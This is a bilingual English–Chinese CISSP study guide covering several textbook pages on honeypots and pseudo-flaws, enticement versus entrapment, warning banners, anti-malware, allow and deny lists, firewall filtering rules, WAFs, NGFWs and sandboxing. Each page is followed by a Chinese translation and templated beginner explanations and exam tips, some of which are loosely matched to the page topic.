Attackers can often detect when they are within a VM and may attempt a VM escape attack to break out of the VM. Administrators often include pseudo-flaws on honeypots to emulate wellknown operating system vulnerabilities. Pseudo-flaws are false vulnerabilities or apparent loopholes intentionally implanted in a system in an attempt to tempt attackers. Attackers seeking to exploit a known flaw might stumble across a pseudo-flaw and think that they have successfully penetrated a system. More sophisticated pseudo-flaw mechanisms actually simulate the penetration and convince the attacker that they have gained additional access privileges to a system.

However, while the attacker is exploring the system, monitoring and alerting mechanisms trigger and alert administrators to the threat. The use of honeypots raises the issue of enticement versus entrapment. An organization can legally use a honeypot as an enticement device if the intruder discovers it through no outward efforts of the honeypot owner. Placing a system on the Internet with open security vulnerabilities and active services with known exploits is enticement. Enticed attackers make their own decisions to perform illegal or unauthorized actions.

Entrapment, which is illegal, occurs when the honeypot owner actively solicits visitors to access the site and then charges them with unauthorized intrusion. In other words, it is entrapment when you trick or encourage someone into performing an illegal or unauthorized action. Laws vary in different countries, so it's important to understand local laws related to enticement and entrapment. Warning Banners Warning banners inform users and intruders about basic security policy guidelines. They typically mention that online activities are audited and monitored, and they often provide reminders of restricted activities. In most

中文直译 / 整理

蜜罐是应对零日漏洞的有效对策,因为它们可以观察攻击者的操作。 蜜罐和蜜网可以部署在网络的任何位置,但管理员通常将它们托管在虚拟系统 上。 这些系统在遭受攻击后更容易重建。 例如,管理员可以配置蜜罐,然后对 蜜罐虚拟机进行快照。 如果攻击者修改了环境,管理员可以将机器恢复到快照 时的状态。 使用虚拟机时,管理员应密切监控蜜罐或蜜网。 攻击者通常能够察 觉自己处于虚拟机中,并可能尝试虚拟机逃逸攻击以突破虚拟机限制。 管理员通常在蜜罐上植入伪漏洞,以模拟众所周知的操作系统漏洞。 伪漏洞 是故意植入系统中的虚假漏洞或看似存在的漏洞,旨在引诱攻击者。 试图利 用已知漏洞的攻击者可能会偶然发现一个伪漏洞,并以为自己已成功渗透系 统。 更复杂的伪漏洞机制甚至会模拟渗透过程,使攻击者相信他们已获得系 统的额外访问权限。 然而,当攻击者在系统中探索时,监控和告警机制会被 触发,通知管理员这一威胁。 蜜罐的使用引发了诱惑与陷害的问题。 如果入侵者在没有蜜罐所有者任何主动 行为的情况下自行发现蜜罐,则组织可以合法地将蜜罐用作诱惑装置。 在互联 网上部署具有开放安全漏洞和已知可利用漏洞的活跃服务属于诱惑。

被诱惑的 攻击者会自行决定实施非法或未经授权的行为。 陷害则是非法的,当蜜罐所有 者主动招揽访客访问站点,随后以未经授权的入侵为由起诉他们时,即构成陷 害。 换句话说,当你欺骗或诱导他人实施非法或未经授权的行为时,即构成陷 害。 不同国家的法律有所不同,因此了解与诱惑和陷害相关的当地法律至关重 要。 警告横幅 警告横幅向用户和入侵者告知基本的安全策略指南。 它们通常提到在线活动 会被审计和监控,并经常提醒禁止的活动。 在大多数

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Recommended、not compulsory 常对应 guideline。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
指南 指南是建议做法,不一定强制。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 40 / PDF P1177

第 1177 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

situations, the wording in banners is important from a legal standpoint because these banners can legally bind users to a permissible set of actions, behaviors, and processes. Unauthorized personnel who are somehow able to log on to a system also see the warning banner. In this case, you can think of a warning banner as an electronic equivalent of a “no trespassing” sign. Most intrusions and attacks can be prosecuted when warnings clearly state that unauthorized access is prohibited and that any activity will be monitored and recorded. Warning banners inform both authorized and unauthorized users. These banners typically remind authorized users of the content in acceptable use agreements.

Anti-malware The most important protection against malicious code is the use of antimalware software with up-to-date signature files and heuristic capabilities. Attackers regularly release new malware and often modify existing malware to prevent detection by anti-malware software. Anti-malware software vendors look for these changes and develop new signature files to detect new and modified malware. Years ago, anti-malware vendors recommended updating signature files once a week. However, most anti-malware software today includes the ability to check for updates several times a day without user intervention.

Originally, anti-malware software focused on viruses, and it was called antivirus software. However, as malware expanded to include other malicious code such as Trojans, worms, spyware, and rootkits, vendors expanded their anti-malware software abilities. Today, most antimalware software will detect and block most malware, so technically, it is anti-malware software. However, most vendors still market their products as antivirus software. The CISSP objectives use the term antimalware.

中文直译 / 整理

情况下,横幅中的措辞从法律角度至关重要,因为这些横幅可以依法将用户 约束在允许的行为、活动和流程范围内。 任何以某种方式成功登录系统的非授权人员也会看到警告横幅。 在这种情况下, 您可以将警告横幅视为“禁止入内”标识的电子等价物。 当警告明确声明未经 授权的访问被禁止,且所有活动将被监控和记录时,大多数入侵和攻击均可依 法追责。 警告横幅同时通知授权用户和非授权用户。 这些横幅通常提醒授权用 户遵守可接受使用协议的内容。 反恶意软件 防范恶意代码最重要的保护措施是使用具有最新签名文件和启发式功能的反恶 意软件。 攻击者定期发布新的恶意软件,并经常修改现有恶意软件以规避反恶 意软件的检测。 反恶意软件供应商会寻找这些变化,并开发新的签名文件以检 测新出现和被修改的恶意软件。 几年前,反恶意软件供应商建议每周更新一次 签名文件。 然而,如今大多数反恶意软件都具备无需用户干预即可每天多次检 查更新的能力。 最初,反恶意软件软件专注于病毒,因此被称为杀毒软件。 然而,随 着恶意软件扩展到包括特洛伊木马、蠕虫、间谍软件和根套件等其他恶意 代码,厂商扩大了其反恶意软件软件的功能。

如今,大多数反恶意软件软 件都能检测并阻止大多数恶意软件,因此从技术上讲,它是反恶意软件软 件。 但大多数厂商仍将其产品营销为杀毒软件。 CISSP目标使用反恶意软件 这一术语。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1177 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

日志要保护完整性、时间同步和访问控制。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 41 / PDF P1178

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Many organizations use a multipronged approach to block malware and detect any malware that gets in. Firewalls with content-filtering capabilities (or specialized content-filter appliances) are commonly used at the boundary between the Internet and the internal network to filter out any type of malicious code. Specialized anti-malware software is installed on email servers to detect and filter out any type of malware passed via email. Additionally, anti-malware software is installed on each system to detect and block malware. Organizations often use a central server to deploy antimalware software, download updated definitions, and push these definitions out to the clients.

A multipronged approach with anti-malware software on each system in addition to filtering internet content helps protect systems from infections from any source. As an example, using up-to-date anti-malware software on each system will detect and block a virus on an employee's USB flash drive. Anti-malware vendors commonly recommend installing only one antimalware application on any system. When a system has more than one antimalware application installed, the applications can interfere with each other and sometimes cause system problems. Additionally, having more than one scanner can consume excessive system resources. Following the principle of least privilege also helps.

Users will not have administrative permissions on systems and will not be able to install applications that may be malicious. If a virus does infect a system, it can often impersonate the logged-in user. When this user has limited privileges, the virus is limited in its capabilities. Additionally, vulnerabilities related to malware increase as more applications are added. Each additional application provides another potential attack point for malicious code. Educating users about the dangers of malicious code, how attackers try to trick users into installing it, and what they can do to limit their risks is another protection method.

A user can often avoid an infection simply by not clicking a link or opening an attachment sent via email. Chapter 2 covers social engineering tactics, including phishing, spear phishing, and whaling. When users are educated about these types of attacks, they are less likely to fall for them. Although many users know about these risks, phishing emails continue to flood the Internet and land in users’ inboxes. The only reason attackers keep sending them is that they continue to fool some users.

中文直译 / 整理

许多组织采用多管齐下的方法来阻止恶意软件并检测任何进入的恶意软件。 具 备内容过滤功能的防火墙(或专用内容过滤设备)通常用于互联网与内部网络 之间的边界,以过滤掉任何类型的恶意代码。 在邮件服务器上安装专用的反恶 意软件软件,以检测和过滤通过电子邮件传递的任何类型的恶意软件。 此外, 在每个系统上安装反恶意软件软件,以检测和阻止恶意软件。 组织通常使用中 央服务器来部署反恶意软件软件、下载更新的定义,并将这些定义推送到客户 端。 通过在每个系统上部署反恶意软件软件并结合互联网内容过滤,可以有效保 护系统免受各种来源的感染。 例如,在每个系统上使用最新的反恶意软件软 件,能够检测并阻止员工USB闪存驱动器中的病毒。 反恶意软件供应商通常建议在任何系统上仅安装一个反恶意软件应用程序。 当 系统安装了多个反恶意软件应用程序时,这些应用程序可能会相互干扰,有时 甚至导致系统问题。 此外,安装多个扫描程序会消耗过多的系统资源。 遵循最小权限原则也有助于提升安全性。 用户在系统上不具有管理员权限,无 法安装可能具有恶意的程序。 如果病毒确实感染了系统,它通常会冒充当前登 录用户。 当该用户权限受限时,病毒的能力也会受到限制。

此外,随着安装的 应用程序增多,与恶意软件相关的漏洞也会增加。 每个额外的应用程序都为恶 意代码提供了另一个潜在的攻击点。 向用户普及恶意代码的危险性、攻击者如何诱骗用户安装此类代码,以及他们 可以采取哪些措施来降低风险,是另一种保护方法。 用户只需不点击通过电子 邮件发送的链接或不打开附件,通常就能避免感染。 第2章涵盖社会工程学攻击手段,包括钓鱼邮件、鱼叉式钓鱼和鲸钓。 当用户了 解这些类型的攻击时,他们就不大可能上当。 尽管许多用户知道这些风险,但 钓鱼邮件仍持续充斥互联网并进入用户的收件箱。 攻击者持续发送这些邮件的 唯一原因,是它们仍然能欺骗部分用户。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

日志要保护完整性、时间同步和访问控制。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 42 / PDF P1179

第 1179 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Education, Policy, and Tools Malicious software is a constant challenge within any organization using IT resources. Consider Kim, who forwarded a seemingly harmless interoffice joke through email to Larry's account. Larry opened the document, which actually contained active code segments that performed harmful actions on his system. Larry then reported a host of “performance issues” and “stability problems” with his workstation, which he'd never complained about before. In this scenario, Kim and Larry don't recognize the harm caused by their apparently innocuous activities. After all, sharing anecdotes and jokes through company email is a common way to bond and socialize.

What's the harm in that, right? The real question is how can you educate Kim, Larry, and all your other users to be more discreet and discerning in handling shared documents and executables? The key is a combination of education, policy, and tools. Education should inform Kim that forwarding nonwork materials on the company network is counter to policy and good behavior. Likewise, Larry should learn that opening attachments unrelated to specific work tasks can lead to all kinds of problems (including those he fell prey to here). Policies should clearly identify the acceptable use of IT resources and the dangers of circulating unauthorized materials.

Tools such as anti-malware software should be employed to prevent and detect any type of malware within the environment. Whitelisting and Blacklisting One of the methods used to control which applications can run and which applications can't run is whitelists and blacklists, though these terms are falling into disuse. Today, it's more common to use the more intuitive phrases allow list (for whitelisting) and deny list or block list (for blacklisting). Using these lists is an effective preventive measure that blocks users from running unauthorized applications. Using allow lists and deny lists for applications can also help prevent malware infections.

The allow list identifies a list of applications authorized to run on a system and blocks all other applications. A deny list identifies a list of applications that are not authorized to run on a system. It's important to

中文直译 / 整理

教育、政策与工具 恶意软件是任何使用IT资源的组织面临的持续挑战。 以Kim为例,他通过 电子邮件将一封看似无害的内部玩笑转发给了Larry的账户。 Larry打开了 该文档,而该文档实际上包含执行有害操作的活跃代码段。 随后,Larry报 告了他的工作站出现了大量“性能问题”和“稳定性问题”,而这些是他 以前从未抱怨过的。 在这种情况下,金和拉里并未意识到他们看似无害的活动所造成的危害。 毕竟,通过公司电子邮件分享轶事和笑话是建立联系和社交的常见方式。 这有什么害处呢? 真正的问题是,如何教育金、拉里以及所有其他用户, 在处理共享文档和可执行文件时更加谨慎和明辨是非? 关键在于教育、政策与工具的结合。 教育应让金明白,在公司网络上转发 非工作材料违反了政策和良好行为规范; 同样,拉里也应了解,打开与具 体工作任务无关的附件可能导致各种问题(包括他在此处遭遇的问题)。 政策应明确界定IT资源的可接受使用方式以及传播未经授权材料的危险。 应使用防恶意软件等工具,以预防和检测环境中任何类型的恶意软件。 白名单与黑名单 用于控制哪些应用程序可以运行、哪些不能运行的方法之一是白名单和黑名单, 尽管这些术语正在逐渐被淘汰。

如今,更常见的是使用更直观的术语:允许列 表(对应白名单)和拒绝列表或阻止列表(对应黑名单)。 使用这些列表是一 种有效的预防措施,可阻止用户运行未经授权的应用程序。 使用应用程序的允许列表和拒绝列表也有助于防止恶意软件感染。 允许列表标 识出被授权在系统上运行的应用程序列表,并阻止所有其他应用程序。 拒绝列 表标识出未被授权在系统上运行的应用程序列表。 重要的是

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1179 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 43 / PDF P1180

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

understand that a system would only use one list, either an allow list or a deny list. Some allow lists identify applications using a hashing algorithm to create a hash. However, if an application is infected with a virus, the virus effectively changes the hash, so this type of allow list blocks infected applications from running too. (Chapter 6, “Cryptography and Symmetric Key Algorithms,” covers hashing algorithms in more depth.) The Apple iOS and iPadOS running on iPhones and iPads, respectively, are examples of extreme versions of allow lists. Users are only able to install apps available from Apple's App Store.

Personnel at Apple review and approve all apps on the App Store and quickly remove misbehaving apps. Although it is possible for users to bypass security and jailbreak their iOS devices, most users don't do so, partly because it is a violation of the end-user license agreement (EULA) and voids the warranty. Jailbreaking removes restrictions on iOS devices and permits root-level access to the underlying operating system. It is similar to rooting a device running the Android operating system. Using a deny list is a good option if administrators know which applications they want to block.

For example, if management wants to ensure that users are not running games on their system, administrators can enable tools to block these games. Firewalls Chapter 11 discussed firewalls in greater depth, but a few things are worth emphasizing when discussing detection and preventive measures. First, firewalls are preventive and technical controls. They attempt to prevent security incidents using technical methods. These basic guidelines can provide a lot of protection against attacks: Block directed broadcasts on routers A directed broadcast acts as a unicast packet until it reaches the destination network.

Attackers have used these to flood targeted networks with broadcasts, so it's common to block directed broadcasts. Many routers have the option to change this setting, but it's to block directed broadcasts.

中文直译 / 整理

理解系统只会使用其中一个列表,要么是允许列表,要么是拒绝列表。 某些允许列表使用哈希算法创建哈希值来识别应用程序。 然而,如果应用程序 被病毒感染,病毒会有效改变哈希值,因此这种类型的允许列表也会阻止已感 染的应用程序运行。 (第6章,“加密与对称密钥算法”更深入地介绍了哈希 算法。 ) 运行在iPhone和iPad上的Apple iOS和iPadOS分别是允许列表的极端示例。 用户只能安装来自Apple应用商店的应用程序。 Apple的员工会审查并批准应 用商店中的所有应用程序,并迅速移除行为异常的应用程序。 尽管用户有可能 绕过安全限制并越狱其iOS设备,但大多数用户并不会这样做,部分原因是这违 反了最终用户许可协议(EULA)并会使保修失效。 越狱会移除iOS设备上的限制,并允许对底层操作系统进行根级别访问。 这类似于对运行Android操作系统的设备进行root操作。 如果管理员知道他们想要阻止哪些应用程序,则使用拒绝列表是一个不错的 选择。 例如,如果管理层希望确保用户不在其系统上运行游戏,管理员可以 启用工具来阻止这些游戏。 防火墙 第11章更深入地讨论了防火墙,但在讨论检测和预防措施时,有几点值得 强调。

首先,防火墙是预防性和技术性控制措施。 它们试图通过技术手段 防止安全事件的发生。 这些基本准则可以提供针对攻击的大量保护: 在路由器上阻止定向广播定向广播在到达目标网络之前表现为单播数据包。 攻 击者曾利用这些广播向目标网络发送大量广播流量,因此通常会阻止定向广播。 许多路由器都提供了更改此设置的选项,但建议阻止定向广播。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

指南:指南是建议做法,不一定强制。

程序:程序是一步一步怎么做。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 44 / PDF P1181

第 1181 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Block private IP addresses at the border Internal networks use private IP address ranges (discussed in Chapter 12), and the Internet uses public IP address ranges. If traffic from the Internet has a source address in a private IP address range, it is a spoofed address, and the firewall should block it. Basic network firewalls filter traffic based on IP addresses, ports, and some protocols using protocol numbers. It's common to place firewalls at the border or edge of a network (between the Internet and the internal network). This allows it to monitor all incoming and outgoing traffic. Firewalls include rules within an ACL to allow specific traffic and end with an implicit deny rule.

The implicit deny rule blocks all traffic not allowed by a previous rule. For example, a firewall can allow HTTP and HTTPS traffic by allowing traffic using TCP ports 80 and 443, respectively. (Chapter 11 covers logical ports in more depth.) Many attackers use ping to discover systems or to launch DoS attacks. For example, an attacker can launch a ping flood attack by flooding a system with pings. Ping uses ICMP, so it's common to block pings by blocking ICMP echo requests at border firewalls. This prevents the pings from reaching the internal network from the Internet. There are other methods of blocking ping. For example, all ICMP traffic uses a protocol number of 1.

A firewall can block ping traffic by blocking protocol number 1. However, this method blocks all ICMP traffic, which is similar to using a bazooka to remove an ant from a picnic table. The Internet Assigned Numbers Authority (IANA) maintains a list of well-known ports matched to protocols. IANA also maintains lists of assigned protocol numbers for IPv4 and IPv6. These pages have changed a few times over the years, but a search for “IANA ports protocol numbers” will get you there. Second-generation firewalls add additional filtering capabilities.

For example, an application-level gateway firewall filters traffic based on specific application requirements and circuit-level gateway firewalls filter traffic based on the communications circuit. Third-generation firewalls (also called stateful inspection firewalls and dynamic packet filtering firewalls) filter traffic based on its state within a stream of traffic.

中文直译 / 整理

在边界处阻止私有IP地址内部网络使用私有IP地址范围(详见第12章),而互联 网使用公有IP地址范围。 如果来自互联网的流量源地址属于私有IP地址范围,则 该地址为伪造地址,防火墙应将其阻止。 基本的网络防火墙基于IP地址、端口和某些协议(使用协议编号)来过滤流量。 通常将防火墙放置在网络的边界或边缘(互联网与内部网络之间),以便监控 所有进出流量。 防火墙在ACL中包含规则,以允许特定流量,并以一条隐式拒绝规则结束。 隐 式拒绝规则会阻止所有未被先前规则允许的流量。 例如,防火墙可以通过允许 使用TCP端口80和443的流量,分别允许HTTP和HTTPS流量。 (第11章更深 入地介绍了逻辑端口。 ) 许多攻击者使用ping来发现系统或发起DoS攻击。 例如,攻击者可以通过向系 统发送大量ping请求来发起ping洪水攻击。 ping使用ICMP,因此通常在边界 防火墙上阻止ICMP回显请求,从而阻止ping。 这可以防止来自互联网的 ping请求到达内部网络。 还有其他阻止ping的方法。 例如,所有ICMP流量都使用协议编号1。 防火墙 可以通过阻止协议编号1来阻止ping流量。

然而,这种方法会阻止所有IC MP流量,这类似于用火箭筒驱赶野餐桌上的一只蚂蚁。 互联网编号分配机构(IANA)维护着一组与协议匹配的知名端口列表。 IANA 还维护着 IPv4 和 IPv6 的已分配协议编号列表。 这些页面多年来已 更改过几次,但搜索“IANA 端口协议编号”即可找到。 第二代防火墙增加了额外的过滤功能。 例如,应用层网关防火墙根据特定应用 程序的需求过滤流量,而电路级网关防火墙则根据通信电路过滤流量。 第三代 防火墙(也称为状态检测防火墙和动态包过滤防火墙)根据流量流中的状态过 滤流量。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1181 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 45 / PDF P1182

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Application firewalls control traffic going to or from a specific application or service. As an example, a web application firewall (WAF) is a specialized application firewall that protects a web server. It inspects all traffic going to a web server and can block malicious traffic such as SQL injection attacks and cross-site scripting (XSS) attacks. This can be processor intensive, so the WAF filters traffic going to the web server but not all network traffic. A next-generation firewall (NGFW) functions as a unified threat management (UTM) device and combines several filtering capabilities. It includes traditional functions of a firewall such as packet filtering and stateful inspection.

However, an NGFW is able to perform packet inspection techniques, allowing it to identify and block malicious traffic. It can filter malware using definition files and/or whitelists and blacklists. It also includes intrusion detection and/or intrusion prevention capabilities. Sandboxing Sandboxing is a virtualization technique that provides a security boundary for applications and prevents the application from interacting with other applications. Anti-malware applications use sandboxing techniques to test unknown applications. If the application displays suspicious characteristics, the sandboxing technique prevents the application from infecting other applications or the operating system.

Application developers often use virtualization techniques to test applications. They create a virtual machine and then isolate it from the host machine and the network. They can then test the application within this sandbox environment without affecting anything outside the virtual machine. Similarly, many anti-malware vendors use virtualization as a sandboxing technique to observe the behavior of malware. Third-Party Security Services Some organizations outsource security services to a third party, which is an individual or organization outside the organization. This can include many different types of services, such as auditing and penetration testing.

In some cases, an organization must provide assurances to an outside entity that third-party service providers comply with specific security requirements. For example, organizations processing transactions with major credit cards must comply with the Payment Card Industry Data Security Standard (PCI DSS). These organizations often outsource some of the services, and PCI DSS

中文直译 / 整理

